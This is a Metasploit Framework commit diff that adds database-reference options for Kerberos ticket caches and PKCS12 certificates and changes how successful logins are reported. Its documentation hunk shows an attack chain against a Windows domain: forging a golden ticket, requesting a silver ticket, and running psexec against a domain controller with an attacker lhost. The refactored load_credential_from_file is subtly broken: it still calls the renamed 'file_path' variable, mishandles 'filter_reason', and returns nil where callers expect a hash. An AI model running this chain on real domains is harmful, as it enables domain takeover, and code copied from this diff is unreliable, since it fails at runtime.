Add database ref opts for kerberos and pkcs12

Author: adfoster-r7

Gemfile.lock

@@ -683,4 +683,4 @@ DEPENDENCIES
   yard
 
 BUNDLED WITH
-   2.5.10
+   2.5.22

docs/metasploit-framework.wiki/kerberos/service_authentication.md

@@ -142,7 +142,7 @@ Optional options:
     * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
     * `write-only` -- New tickets are requested and they are stored for reuse.
     * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
-* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
 
 ## Ticket management
 

documentation/modules/auxiliary/admin/kerberos/get_ticket.md

@@ -298,14 +298,14 @@ host             service  type                 name  content                   i
 TGS using a previously forged golden ticket:
 
 ```
-# Forge a golden ticket
+# 1. Forge a golden ticket
 msf auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_GOLDEN aes_key=dac659cec15c80bb2bc8b26cdd3f29076cff84da7ab7ec6cf9dfc2cafa33e087 domain_sid=S-1-5-21-2771926996-166873999-4256077803 domain=dev.demo.local spn=krbtgt/DEV.DEMO.LOCAL user=Administrator
 
 [*] TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin
 [*] Auxiliary module execution completed
 
 
-# Request a silver ticket:
+# 2. Request a silver ticket:
 
 msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5 Krb5Ccname=/Users/user/.msf4/loot/20230309120450_default_unknown_mit.kerberos.cca_940462.bin username=Administrator domain=dev.demo.local spn=cifs/dc02.dev.demo.local
 [*] Running module against 10.10.11.5
@@ -317,7 +317,7 @@ msf auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhosts=10.10.11.5
 [+] 10.10.11.5:88 - Received a valid delegation TGS-Response
 [*] Auxiliary module execution completed
 
-# Use psexec:
+# 3. Use psexec:
 
 msf exploit(windows/smb/psexec) > run rhost=10.10.11.5 smbdomain=dev.demo.local username=Administrator smb::auth=kerberos smb::krb5ccname=/Users/user/.msf4/loot/20230309120802_default_10.10.11.5_mit.kerberos.cca_352530.bin smb::rhostname=dc02.dev.demo.local domaincontrollerrhost=10.10.11.5 lhost=192.168.123.1
 

lib/metasploit/framework/ldap/client.rb

@@ -111,20 +111,11 @@ def ldap_auth_opts_plaintext(opts)
 
         def ldap_auth_opts_schannel(opts, ssl)
           auth_opts = {}
-          pfx_path = opts[:ldap_cert_file]
           raise Msf::ValidationError, 'The SSL option must be enabled when using Schannel authentication.' unless ssl
           raise Msf::ValidationError, 'Can not sign and seal when using Schannel authentication.' if opts.fetch(:sign_and_seal, false)
 
-          if pfx_path.present?
-            unless ::File.file?(pfx_path) && ::File.readable?(pfx_path)
-              raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.'
-            end
-
-            begin
-              pkcs = OpenSSL::PKCS12.new(File.binread(pfx_path), '')
-            rescue StandardError => e
-              raise Msf::ValidationError, "Failed to load the PFX file (#{e})"
-            end
+          if opts[:ldap_pkcs12].present?
+            pkcs = opts[:ldap_pkcs12][:value]
           else
             pkcs12_storage = Msf::Exploit::Remote::Pkcs12::Storage.new(
               framework: opts[:framework],

lib/msf/core/auxiliary/report_summary.rb

@@ -71,11 +71,23 @@ def login_credentials(credential_data)
       def create_credential_login(credential_data)
         return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report
 
-        @report[rhost] = { successful_logins: [] }
+        @report[rhost] ||= {}
+        @report[rhost][:successful_logins] ||= []
         @report[rhost][:successful_logins] << login_credentials(credential_data)
         super
       end
 
+      def report_successful_login(public:, private:)
+        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report
+
+        @report[rhost] ||= {}
+        @report[rhost][:successful_logins] ||= []
+        @report[rhost][:successful_logins] << {
+          public: public,
+          private_data: private
+        }
+      end
+
       # Creates a credential and adds to to the DB if one is present, then calls create_credential_login to
       # attempt a login
       #
@@ -90,7 +102,8 @@ def create_credential_login(credential_data)
       def create_credential_and_login(credential_data)
         return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report
 
-        @report[rhost] = { successful_logins: [] }
+        @report[rhost] ||= {}
+        @report[rhost][:successful_logins] ||= []
         @report[rhost][:successful_logins] << login_credentials(credential_data)
         super
       end
@@ -107,14 +120,9 @@ def create_credential_and_login(credential_data)
       def start_session(obj, info, ds_merge, crlf = false, sock = nil, sess = nil)
         return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins']
 
-        unless @report && @report[rhost]
-          elog("No RHOST found in report, skipping reporting for #{rhost}")
-          print_brute level: :error, ip: rhost, msg: "No RHOST found in report, skipping reporting for #{rhost}"
-          return super
-        end
-
         result = super
-        @report[rhost].merge!({ successful_sessions: [] })
+        @report[rhost] ||= {}
+        @report[rhost][:successful_sessions] ||= []
         @report[rhost][:successful_sessions] << result
         result
       end

lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb

@@ -90,6 +90,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
                 :print_status,
                 :print_good,
                 :vprint_error,
+                :print_error,
                 :vprint_status,
                 :workspace
 
@@ -156,7 +157,8 @@ def initialize(
     credential = nil
     if cache_file.present?
       # the cache file is only used for loading credentials, it is *not* written to
-      credential = load_credential_from_file(cache_file, sname: nil, sname_hostname: @hostname)
+      load_sname_hostname_credential_result = load_credential_from_file(cache_file, sname: nil, sname_hostname: @hostname)
+      credential = load_sname_hostname_credential_result[:credential]
       serviceclass = build_spn.name_string.first
       if credential && credential.server.components[0] != serviceclass
         old_sname = credential.server.components.snapshot.join('/')
@@ -167,9 +169,18 @@ def initialize(
         ticket.sname.name_string[0] = serviceclass
         credential.ticket = ticket.encode
       elsif credential.nil? && hostname.present?
-        credential = load_credential_from_file(cache_file, sname: "krbtgt/#{hostname.split('.', 2).last}")
+        load_sname_krbtgt_hostname_credential_result = load_credential_from_file(cache_file, sname: "krbtgt/#{hostname.split('.', 2).last}")
+        credential = load_sname_krbtgt_hostname_credential_result[:credential]
       end
       if credential.nil?
+        vprint_error("Failed to load a usable credential from ticket file: #{cache_file}")
+        vprint_error("Attempt: finding a valid credential in #{cache_file} for sname: nil, and sname_hostname: #{@hostname}:")
+        vprint_error(load_sname_hostname_credential_result[:filter_reasons].join("\n").indent(2))
+
+        if load_sname_krbtgt_hostname_credential_result
+          vprint_error("Attempt: Failed finding a valid credential in #{cache_file} for sname: #{"krbtgt/#{hostname.split('.', 2).last}"}")
+          vprint_error(load_sname_krbtgt_hostname_credential_result[:filter_reasons].join("\n").indent(2))
+        end
         raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new("Failed to load a usable credential from ticket file: #{cache_file}")
       end
       print_status("Loaded a credential from ticket file: #{cache_file}")
@@ -254,6 +265,7 @@ def authenticate(options = {})
     elsif options[:credential]
       auth_context = authenticate_via_krb5_ccache_credential_tgs(options[:credential], options)
     else
+      # TODO: If krbcachemode=none is set, should this be getting used?
       pkcs12_storage = Msf::Exploit::Remote::Pkcs12::Storage.new(framework: framework, framework_module: framework_module)
       pkcs12_results = pkcs12_storage.pkcs12(
         workspace: workspace,
@@ -361,7 +373,7 @@ def build_spn(options = {})
   # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
   def request_tgt_only(options = {})
     if options[:cache_file]
-      credential = load_credential_from_file(options[:cache_file])
+      credential = load_credential_from_file(options[:cache_file])[:credential]
     else
       credential = get_cached_credential(
         options.merge(
@@ -1054,67 +1066,92 @@ def get_cached_credential(options = {})
     )
   end
 
-  # Load a credential object from a file for authentication. Credentials in the file will be filtered by multiple
+  # Load a credential object from a file or database entry for authentication. Credentials in the credential cache will be filtered by multiple
   # attributes including their timestamps to ensure that the returned credential appears usable.
   #
-  # @param [String] file_path The file path to load a credential object from
+  # @param [path] path The file path to load a credential object from or database string reference
   # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CacheCredential] the credential object for authentication
-  def load_credential_from_file(file_path, options = {})
-    unless File.readable?(file_path.to_s)
-      wlog("Failed to load ticket file '#{file_path}' (file not readable)")
-      return nil
-    end
+  def load_credential_from_file(path, options = {})
+    # Load a database reference or a path
+    if path.start_with?('id:')
+      id = path.delete_prefix('id:')
+      storage = Msf::Exploit::Remote::Kerberos::Ticket::Storage::ReadOnly.new(framework: framework)
+      cache = storage.tickets({ id: id  }).first&.ccache
+      if !cache
+        wlog("Invalid cache id #{id} provided") unless cache
+        return { credential: nil }
+      end
+    else
+      unless File.readable?(file_path.to_s)
+        wlog("Failed to load ticket file '#{file_path}' (file not readable)")
+        return nil
+      end
 
-    begin
-      cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(File.binread(file_path))
-    rescue StandardError => e
-      elog("Failed to load ticket file '#{file_path}' (parsing failed)", error: e)
-      return nil
+      begin
+        cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(File.binread(file_path))
+      rescue StandardError => e
+        elog("Failed to load ticket file '#{file_path}' (parsing failed)", error: e)
+        return nil
+      end
     end
 
     sname = options.fetch(:sname) { build_spn&.to_s }
     sname_hostname = options.fetch(:sname_hostname, nil)
     now = Time.now.utc
 
+    filter_reasons = []
+
     cache.credentials.to_ary.each.with_index(1) do |credential, index|
       tkt_start = credential.starttime == Time.at(0).utc ? credential.authtime : credential.starttime
       tkt_end = credential.endtime
 
       unless tkt_start < now
-        wlog("Filtered credential #{file_path} ##{index} reason: Ticket start time is before now (start: #{tkt_start})")
+        filter_reason = "Filtered credential #{path} ##{index} reason: Ticket start time is before now (start: #{tkt_start})"
+        filter_reasons << filter_reason
+        wlog(filter_reason)
         next
       end
 
       unless now < tkt_end
-        wlog("Filtered credential #{file_path} ##{index} reason: Ticket is expired (expiration: #{tkt_end})")
+        wlog("Filtered credential #{path} ##{index} reason: Ticket is expired (expiration: #{tkt_end})")
+        filter_reasons << filter_reason
+        wlog(filter_reason)
         next
       end
 
       unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
-        wlog("Filtered credential #{file_path} ##{index} reason: Realm (#{@realm}) does not match (realm: #{credential.server.realm})")
+        filter_reason = "Filtered credential #{path} ##{index} reason: Realm (#{@realm}) does not match (realm: #{credential.server.realm})"
+        filter_reasons << filter_reason
+        wlog(filter_reason)
         next
       end
 
       unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
-        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname}) does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        filter_reason = "Filtered credential #{path} ##{index} reason: SPN (#{sname}) does not match (spn: #{credential.server.components.snapshot.join('/')})"
+        filter_reasons << filter_reason
+        wlog(filter_reason)
         next
       end
 
       unless !sname_hostname ||
           sname_hostname.to_s.downcase == credential.server.components[1].downcase ||
           sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1].downcase)
-        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        filter_reason = "Filtered credential #{path} ##{index} reason: SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})"
+        filter_reasons << filter_reason
+        wlog(filter_reason)
         next
       end
 
       unless !@username || @username.casecmp?(credential.client.components.last.to_s)
-        wlog("Filtered credential #{file_path} ##{index} reason: Username (#{@username}) does not match (username: #{credential.client.components.last})")
+        filter_reason = "Filtered credential #{path} ##{index} reason: Username (#{@username}) does not match (username: #{credential.client.components.last})"
+        filter_reasons << filter_reason
+        wlog(filter_reason)
         next
       end
 
-      return credential
+      return { credential: credential, filter_reasons: filter_reasons }
     end
 
-    nil
+    { credential: nil, filter_reasons: filter_reasons }
   end
 end

lib/msf/core/exploit/remote/kerberos/service_authenticator/options.rb

@@ -41,7 +41,7 @@ def kerberos_auth_options(protocol:, auth_methods:)
         [false, 'The resolvable rhost for the Domain Controller'],
         conditions: option_conditions
       ),
-      Msf::OptPath.new(
+      Msf::OptKerberosCredentialCache.new(
         "#{protocol}::Krb5Ccname",
         [false, 'The ccache file to use for kerberos authentication', nil],
         conditions: option_conditions

lib/msf/core/exploit/remote/ldap.rb

@@ -40,13 +40,14 @@ def initialize(info = {})
           Opt::Proxies,
           *kerberos_storage_options(protocol: 'LDAP'),
           *kerberos_auth_options(protocol: 'LDAP', auth_methods: Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS),
-          Msf::OptPath.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
+          Msf::OptPkcs12Cert.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
           OptFloat.new('LDAP::ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0]),
           OptEnum.new('LDAP::Signing', [true, 'Use signed and sealed (encrypted) LDAP', 'auto', %w[ disabled auto required ]])
         ]
       )
     end
 
+
     # Alias to return the RHOST datastore option.
     #
     # @return [String] The current value of RHOST in the datastore.
@@ -68,21 +69,23 @@ def peer
       "#{rhost}:#{rport}"
     end
 
+
     # Set the various connection options to use when connecting to the
     # target LDAP server based on the current datastore options. Returns
     # the resulting connection configuration as a hash.
     #
     # @return [Hash] The options to use when connecting to the target
     #    LDAP server.
     def get_connect_opts
+      pkcs12_storage = Msf::Exploit::Remote::Pkcs12::Storage.new(framework: framework, framework_module: self)
       opts = {
         username: datastore['LDAPUsername'],
         password: datastore['LDAPPassword'],
         domain: datastore['LDAPDomain'],
         base: datastore['BASE_DN'],
         domain_controller_rhost: datastore['DomainControllerRhost'],
         ldap_auth: datastore['LDAP::Auth'],
-        ldap_cert_file: datastore['LDAP::CertFile'],
+        ldap_pkcs12: datastore['LDAP::CertFile'] ? pkcs12_storage.read_pkcs12_cert_path(datastore['LDAP::CertFile']) : nil,
         ldap_rhostname: datastore['LDAP::Rhostname'],
         ldap_krb_offered_enc_types: datastore['LDAP::KrbOfferedEncryptionTypes'],
         ldap_krb5_cname: datastore['LDAP::Krb5Ccname'],

lib/msf/core/exploit/remote/pkcs12/storage.rb

@@ -16,6 +16,32 @@ def initialize(framework: nil, framework_module: nil)
       @framework_module = framework_module
     end
 
+    # @param [String] cert_path A path to the file system where a pkcs12 cert is located, or a reference to a core database i.e., "id:123"
+    # @param [String] cert_pass The certificate password
+    # @param [String] workspace The workspace to restrict searches to
+    def read_pkcs12_cert_path(cert_path, cert_pass = '', workspace: nil)
+      if cert_path.start_with?('id:')
+        core = framework.db.creds({ workspace: workspace, id: cert_path.delete_prefix('id:') }).first
+        raise Msf::ValidationError, 'Invalid cert id provided' unless core
+        raise Msf::ValidationError, 'Invalid cert id provided - not a pkcs12 credential' unless core.private.type == 'Metasploit::Credential::Pkcs12'
+
+        data = Base64.decode64(core.private.data)
+      else
+        is_readable = ::File.file?(cert_path) && ::File.readable?(cert_path)
+        raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.' unless is_readable
+        data = File.binread(cert_path)
+      end
+
+      begin
+        # TODO: This current database model approach doesn't store the cred password? Or does it? i.e. in metadata CERT_PASSWORD
+        pkcs12 = OpenSSL::PKCS12.new(data, cert_pass)
+      rescue StandardError => e
+        raise Msf::ValidationError, "Failed to load the PFX file (#{e})"
+      end
+
+      { path: cert_path, value: pkcs12 }
+    end
+
     # Get stored pkcs12 matching the options query.
     #
     # @param [Hash] options The options for matching pkcs12's.